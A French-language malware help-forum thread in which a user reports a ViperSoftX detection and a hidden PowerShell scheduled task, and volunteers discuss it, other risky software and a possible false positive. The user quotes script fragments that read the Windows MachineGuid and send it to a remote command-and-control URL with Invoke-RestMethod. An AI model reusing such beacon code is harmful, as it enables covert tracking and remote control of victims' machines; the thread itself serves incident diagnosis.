Bonjour,
J ai constaté l ouverture et la fermeture express d une command prompt powershell pendant que je jouais à des jeux vidéos depuis plusieurs jours déja. Après inspection et une analyse par Avast un fichier Log est retrouvé sous le nom de "Virus ViperSoftX-B [Pws]"
dans C:\windows\system32\logs\microsoft-windows-powershell%4operational.evtx.
le fichier etant sous quarantaine avast et n'etant pas sur que celui ci n est plus actif puisque c est un simple log, j ai fais un analyse par FRST.
voici les 2 rapports :
FRST
https://pjjoint.malekal.com/files.php?i ... v12z9w11v8
Addition
https://pjjoint.malekal.com/files.php?i ... 0c111211l6
de plus, j ai capturé avec procmon lors d une session de jeu lorsque la fenetre s est ouverte et fermé en 1sec et j ai trouvé un lien explorer pointant vers "C:\Windows\System32\2E6B62D1-0113-4917-A509-CE8EEA7105EE.ps1" fichier non retrouvé a l emplacement dite fichier masqué inclus.
Pouvez vous m aider a fix les derniers points a partir du log frst, je vous en remercie par avance.
bonne soirée.
Virus ViperSoftX-B [Pws]
Modérateurs : Mods Windows, Helper
- Messages : 21818
- Inscription : 02 juin 2012 20:48
- Localisation : Thomas Anderson : Je suis dans et en dehors de la matrice :-)
Re: Virus ViperSoftX-B [Pws]
Bonsoir
Malekal ou Angélique te diront ce qu'il en est avec ce RAT voleur de Cryptos vu qu'il y a (avait ?) une tache programmée via Powershell
Bypass -File "C:\Windows\System32\2E6B62D1-0113-4917-A509-CE8EEA7105EE.ps1"
Au delà de cela :
Je note que tu as OverWolf
De nombreux joueurs constatent une conso importante du processeur, réseau, de lags en jeux etc
Déjà il faut savoir que ce truc est mouchard qui fait de la télémétrie à outrance pour revendre les données utilisateurs
En plus ils bloquent les autres gestionnaires de mods dans les jeux, sans compter les publicités autorisées dans l'application qui étaient des logiciels malveillants (signalé et vérifié après le rachat de Curseforge qui est un outil "gratuit" pour les éditeurs de mods)
En plus ils font du scraping https://fr.wikipedia.org/wiki/Web_scraping et là où c'est fort c'est que les USA l'autorisent sous certaines conditions, donc le programme et tout ce qui tourne autour, ne peut pas être flagué comme "malveillant" sinon ils se prennent un procès
L'application avait été surprise à communiquer avec l'IP 167.71.251.62 qui en fait effectuait des attaques RDP
https://www.malekal.com/piratage-serveu ... al-server/
En remontant l'IP on trouve Digital Ocean Digital Ocean pris la main dans le sac par le passé à pomper les données "clients" et à les revendre à des tiers (ils sont derrière OverWolf )
Ton WinRar est dépassé et présente une faille
Les malveillants exploitent cette faille pour infecter les PC (Stealer, Rat, Ransomware)
A lire : viewtopic.php?p=554708
Tes
Sont légaux ? (C'est une question pas un reproche)
Parce que voila ce que tu risques
viewtopic.php?p=544690#p544690
Cela te fera un peu de lecture en attendant...
Malekal ou Angélique te diront ce qu'il en est avec ce RAT voleur de Cryptos vu qu'il y a (avait ?) une tache programmée via Powershell
Bypass -File "C:\Windows\System32\2E6B62D1-0113-4917-A509-CE8EEA7105EE.ps1"
Au delà de cela :
Je note que tu as OverWolf
De nombreux joueurs constatent une conso importante du processeur, réseau, de lags en jeux etc
Déjà il faut savoir que ce truc est mouchard qui fait de la télémétrie à outrance pour revendre les données utilisateurs
En plus ils bloquent les autres gestionnaires de mods dans les jeux, sans compter les publicités autorisées dans l'application qui étaient des logiciels malveillants (signalé et vérifié après le rachat de Curseforge qui est un outil "gratuit" pour les éditeurs de mods)
En plus ils font du scraping https://fr.wikipedia.org/wiki/Web_scraping et là où c'est fort c'est que les USA l'autorisent sous certaines conditions, donc le programme et tout ce qui tourne autour, ne peut pas être flagué comme "malveillant" sinon ils se prennent un procès
L'application avait été surprise à communiquer avec l'IP 167.71.251.62 qui en fait effectuait des attaques RDP
https://www.malekal.com/piratage-serveu ... al-server/
En remontant l'IP on trouve Digital Ocean Digital Ocean pris la main dans le sac par le passé à pomper les données "clients" et à les revendre à des tiers (ils sont derrière OverWolf )
Ton WinRar est dépassé et présente une faille
Les malveillants exploitent cette faille pour infecter les PC (Stealer, Rat, Ransomware)
A lire : viewtopic.php?p=554708
Tes
Code : Tout sélectionner
Adobe After Effects 2023
Adobe Animate 2023
Adobe Audition 2023
Adobe Character Animator 2023
Adobe Illustrator 2023
Adobe InCopy 2023
Adobe InDesign 2023
Adobe Lightroom Classic
Adobe Media Encoder 2023
Adobe Photoshop 2023
Adobe Premiere Pro 2023 Parce que voila ce que tu risques
viewtopic.php?p=544690#p544690
Cela te fera un peu de lecture en attendant...
- Only Amiga... Was possible ! Lien https://forum.malekal.com/viewtopic.php?t=60830
- « Un problème sans solution est un problème mal posé. » (Albert Einstein)
- « Tous les patients mentent » (Théorème du Docteur House) Que ce soit consciemment ou inconsciemment
- Jeff Goldblum dans Informatic Park, professeur adepte de la théorie du chaos : « Vous utilisez un crack, un keygen ? Qu’est-ce qui pourrait mal tourner?? »
- Captcha : Il s'agit d'un ordinateur qui demande à un humain de prouver.. qu'il n'est pas un ordinateur ! (Les prémices du monde de demain)
- Dans le monde il y a deux sortes de gens : Ceux qui font des sauvegardes et .. Ceux qui vont faire des sauvegardes (Extrait du Credo.. Telle est la voie ! )
- « Un problème sans solution est un problème mal posé. » (Albert Einstein)
- « Tous les patients mentent » (Théorème du Docteur House) Que ce soit consciemment ou inconsciemment
- Jeff Goldblum dans Informatic Park, professeur adepte de la théorie du chaos : « Vous utilisez un crack, un keygen ? Qu’est-ce qui pourrait mal tourner?? »
- Captcha : Il s'agit d'un ordinateur qui demande à un humain de prouver.. qu'il n'est pas un ordinateur ! (Les prémices du monde de demain)
- Dans le monde il y a deux sortes de gens : Ceux qui font des sauvegardes et .. Ceux qui vont faire des sauvegardes (Extrait du Credo.. Telle est la voie ! )
- Messages : 3
- Inscription : 21 mai 2024 21:16
Re: Virus ViperSoftX-B [Pws]
Merci pour votre réponse rapide et la bienveillance envers les logiciels douteux.
OverWolf est désinstallé, cela fait un bon moment que je ne joue plus à WoW ;) pour son utilité primaire.
Winrar à suivi le même chemin pour un lifting vers un autre logiciel de compression plus récent.
je prends note des diverses notifications en liens que vous m avez transmis et vous remercies pour le temps consacré.
Une bonne lecture en attendant la suite.
cordialment.
OverWolf est désinstallé, cela fait un bon moment que je ne joue plus à WoW ;) pour son utilité primaire.
Winrar à suivi le même chemin pour un lifting vers un autre logiciel de compression plus récent.
je prends note des diverses notifications en liens que vous m avez transmis et vous remercies pour le temps consacré.
Une bonne lecture en attendant la suite.
cordialment.
- Messages : 117054
- Inscription : 10 sept. 2005 13:57
Re: Virus ViperSoftX-B [Pws]
Salut,
Les rapports ne montrent pas de malware.
J'aurai tendance à dire qu'il s'agit d'un faux positif.
Les rapports ne montrent pas de malware.
J'aurai tendance à dire qu'il s'agit d'un faux positif.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
➔ Comment protéger son PC des virus
➔ Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11
Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
➔ Comment protéger son PC des virus
➔ Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11
Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
- Messages : 3
- Inscription : 21 mai 2024 21:16
Re: Virus ViperSoftX-B [Pws]
Bonjour Malekal morte,
Merci pour votre conclusion suite au rapport précédemment envoyé.
j ai noté une tentative de connexion dans le rapport powershell sur un site non sécurisé http://cesareurope.com et celui ci à été fermé comme expliqué dans le topic faux positif.
'HKLM:\SOFTWARE\Microsoft\Cryptography' -Name MachineGuid).MachineGUID;"
"Invoke-RestMethod -Uri "http://cesareurope.com/api/v1/$($guid)"
la notification dans le fichier log à fait tilte mon antivirus lors du scan pré boot après l analyse de l eventviewer Windows.
le fichier à été passé sous virustotal, avast et avg sont les 2 qui détecte ce marqueur.
je vous remercie en espérant ne pas avoir de surprise plus tard XD.
Merci pour votre conclusion suite au rapport précédemment envoyé.
j ai noté une tentative de connexion dans le rapport powershell sur un site non sécurisé http://cesareurope.com et celui ci à été fermé comme expliqué dans le topic faux positif.
'HKLM:\SOFTWARE\Microsoft\Cryptography' -Name MachineGuid).MachineGUID;"
"Invoke-RestMethod -Uri "http://cesareurope.com/api/v1/$($guid)"
la notification dans le fichier log à fait tilte mon antivirus lors du scan pré boot après l analyse de l eventviewer Windows.
le fichier à été passé sous virustotal, avast et avg sont les 2 qui détecte ce marqueur.
je vous remercie en espérant ne pas avoir de surprise plus tard XD.
- Messages : 21818
- Inscription : 02 juin 2012 20:48
- Localisation : Thomas Anderson : Je suis dans et en dehors de la matrice :-)
Re: Virus ViperSoftX-B [Pws]
Bonsoir
Lis https://forum.avast.com/index.php?topic=322159.0
En fait comme il est dit
Perso dans les taches programmées je connais le "actif" et "désactivé mais pas ce "Bypass" (le nom est explicite mais je ne pense pas l'avoir déjà rencontré)
Peut etre que Malekal en sait plus à ce sujet
Bypass -File "C:\Windows\System32\2E6B62D1-0113-4917-A509-CE8EEA7105EE.ps1"
Edit : Et cesareurope.com peut ne plus être en ligne (souvent le cas)
Sur cesareurope.com il est sur la liste avec d'autres en lien avec
https://www.virustotal.com/gui/file/4f3 ... /detection
Le code est un script PowerShell qui semble être conçu pour télécharger et exécuter des mises à jour à partir d'un serveur distant.
https://raw.githubusercontent.com/apwlq ... main/hosts
Lis https://forum.avast.com/index.php?topic=322159.0
En fait comme il est dit
Le truc c'est que ton PC peut avoir bloqué le RAT, ce qui fait qu'il est sain, mais le script Powershell peut rester présent et être bloqué suivant les conditions indiquées ci dessus (Même soucis avec d'autres AV du reste dont Defender)Avast empêche l'accès au site suspect.
Avast ne peut supprimer que ce qu'il considère comme des logiciels malveillants, etc. Le simple fait d'exécuter un script Power Shell n'est pas nécessairement malveillant. C’est dans le fait qu’il tente de se connecter à un site considéré comme suspect qu’il intervient.
Perso dans les taches programmées je connais le "actif" et "désactivé mais pas ce "Bypass" (le nom est explicite mais je ne pense pas l'avoir déjà rencontré)
Peut etre que Malekal en sait plus à ce sujet
Bypass -File "C:\Windows\System32\2E6B62D1-0113-4917-A509-CE8EEA7105EE.ps1"
Edit : Et cesareurope.com peut ne plus être en ligne (souvent le cas)
Sur cesareurope.com il est sur la liste avec d'autres en lien avec
https://www.virustotal.com/gui/file/4f3 ... /detection
Le code est un script PowerShell qui semble être conçu pour télécharger et exécuter des mises à jour à partir d'un serveur distant.
Il est sur la liste des adresses à blacklister depuis le 4 décembre 2022Le script définit d'abord une fonction appelée Get-Updates, qui prend un nom d'hôte comme paramètre. La fonction tente ensuite de résoudre le nom d'hôte en une adresse IP, puis télécharge un fichier depuis le serveur.
Le fichier téléchargé est ensuite vérifié à l'aide d'une signature numérique et, si la signature est valide, le fichier est exécuté.
Le script boucle ensuite indéfiniment, téléchargeant et exécutant des mises à jour toutes les 30 secondes.
Les risques potentiels de ce script sont qu'il pourrait être utilisé pour télécharger et exécuter du code malveillant sur l'ordinateur d'une victime.
Le script pourrait également être utilisé pour exfiltrer des données sensibles de l'ordinateur d'une victime.
https://raw.githubusercontent.com/apwlq ... main/hosts
- Only Amiga... Was possible ! Lien https://forum.malekal.com/viewtopic.php?t=60830
- « Un problème sans solution est un problème mal posé. » (Albert Einstein)
- « Tous les patients mentent » (Théorème du Docteur House) Que ce soit consciemment ou inconsciemment
- Jeff Goldblum dans Informatic Park, professeur adepte de la théorie du chaos : « Vous utilisez un crack, un keygen ? Qu’est-ce qui pourrait mal tourner?? »
- Captcha : Il s'agit d'un ordinateur qui demande à un humain de prouver.. qu'il n'est pas un ordinateur ! (Les prémices du monde de demain)
- Dans le monde il y a deux sortes de gens : Ceux qui font des sauvegardes et .. Ceux qui vont faire des sauvegardes (Extrait du Credo.. Telle est la voie ! )
- « Un problème sans solution est un problème mal posé. » (Albert Einstein)
- « Tous les patients mentent » (Théorème du Docteur House) Que ce soit consciemment ou inconsciemment
- Jeff Goldblum dans Informatic Park, professeur adepte de la théorie du chaos : « Vous utilisez un crack, un keygen ? Qu’est-ce qui pourrait mal tourner?? »
- Captcha : Il s'agit d'un ordinateur qui demande à un humain de prouver.. qu'il n'est pas un ordinateur ! (Les prémices du monde de demain)
- Dans le monde il y a deux sortes de gens : Ceux qui font des sauvegardes et .. Ceux qui vont faire des sauvegardes (Extrait du Credo.. Telle est la voie ! )
-
- Sujets similaires
- Réponses
- Vues
- Dernier message
-
- 13 Réponses
- 588 Vues
-
Dernier message par Parisien_entraide
-
- 5 Réponses
- 271 Vues
-
Dernier message par Parisien_entraide
-
- 11 Réponses
- 359 Vues
-
Dernier message par industryplant
-
- 14 Réponses
- 337 Vues
-
Dernier message par Czav
-
- 4 Réponses
- 2700 Vues
-
Dernier message par Malekal_morte